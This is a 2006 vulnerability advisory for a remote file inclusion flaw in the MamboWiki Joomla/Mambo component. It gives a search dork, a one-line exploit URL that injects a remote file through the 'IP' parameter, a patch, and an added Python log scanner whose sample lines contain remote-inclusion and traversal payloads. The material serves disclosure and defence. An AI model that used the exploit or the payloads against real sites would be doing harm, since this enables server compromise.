From: camino_(at)_sexmagnet.com <camino_(at)_sexmagnet.com>
Date: 21.08.2006
Subject: Joomla MamboWiki Component <= 0.9.4 (MamboLogin.php) Remote File Inclusion Vulnerability


   .:[ insecurity research team ]:.
    .__..____.:.______.____.:.____ .
.:. |  |/    \:/  ___// __ \:/   _\.:.
  : |  |   |  \\____\\  ___/\   /__ :. .
..: |__|___|  /____  >\___  >\___  >.:
  .:.. ..  .\/   .:\/:.  .\/.  .:\/:
.   ...:.    .advisory.    .:...
        :..................: 18.o8.2oo6 ..


 Affected Application: MamboWiki <= v0.9.4

         (Mambo/Joomla CMS Component)


. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


 Discovered by: camino

 Team: Insecurity Research Team

 URL: http://www.insecurityresearch.org

 E-Mail: camino[at]sexmagnet[dot]com



. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .


 Type: Remote [x]  Local [ ]

      Remote File Inclusion [x]  SQL Injection [ ]

 Level: Low [ ]  Middle [ ]  High [x]

 Application: MamboWiki

 Version: <= 0.9.4

 Vulnerable File: MamboLogin.php

 URL: http://www.lyquidity.com

 Description: A Wikipedia-like wiki component for Joomla/Mambo.

 Dork: inurl:"com_mambowiki"



. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


 http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP=http://huh?



. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .


 o1.) open MamboLogin.php

 o2.) add this in line 8:

        // abort unless the file was loaded through the Mambo/Joomla front controller,
        // which is the only place _VALID_MOS gets defined
        defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

 o3.) done!
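As an added defender-side example (not part of the advisory), the script below scans Apache combined-format access logs for requests that feed a URL scheme, stream wrapper or parent-directory traversal into the MamboLogin.php `IP` parameter described above; the log lines, client addresses and the traversal case are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Component file and parameter named in the advisory (compared case-insensitively)
VULN_PATH = "components/com_mambowiki/mambologin.php"
VULN_PARAM = "IP"
# A URL scheme or stream wrapper makes include() fetch code from outside the site tree
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect)://', re.IGNORECASE)
# Parent-directory traversal points include() at a local file it should not read
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def classify_target(target):
    """Return a finding for an RFI/LFI probe against MamboLogin.php, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_PATH):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM, []):
        value = unquote(value)              # parse_qs decoded once; tolerate double-encoding
        if REMOTE_RE.search(value):
            return {"kind": "remote-file-inclusion", "param": VULN_PARAM, "value": value}
        if TRAVERSAL_RE.search(value):
            return {"kind": "local-file-traversal", "param": VULN_PARAM, "value": value}
    return None


def scan_log(lines):
    """Return (client_ip, status, finding) for every line that probes MamboLogin.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        finding = classify_target(m.group("target")) if m else None
        if finding:
            findings.append((m.group("ip"), m.group("status"), finding))
    return findings


# Constructed sample log lines (not real traffic); addresses are documentation ranges
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Aug/2006:10:15:02 +0000] "GET /joomla/components/com_mambowiki/MamboLogin.php?IP=http://203.0.113.9/x.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [21/Aug/2006:10:16:11 +0000] "GET /joomla/components/com_mambowiki/MamboLogin.php?IP=http%3A%2F%2F198.51.100.5%2Fs.txt HTTP/1.1" 200 512 "-" "curl/7.15"',
    '192.0.2.10 - - [21/Aug/2006:10:17:30 +0000] "GET /joomla/index.php?option=com_mambowiki HTTP/1.1" 200 8211 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [21/Aug/2006:10:18:01 +0000] "GET /joomla/components/com_mambowiki/MamboLogin.php?IP=../../configuration.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, status, f in scan_log(SAMPLE_LOG):
        print(f"{f['kind']} probe from {client} (HTTP {status}): {f['param']}={f['value']}")
```

An HTTP 200 on such a request, rather than the "Direct Access ... not allowed" abort from the fix above, is the signal that the guard is not yet in place.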



. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .


 my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members

 of insecurity research team ;-)
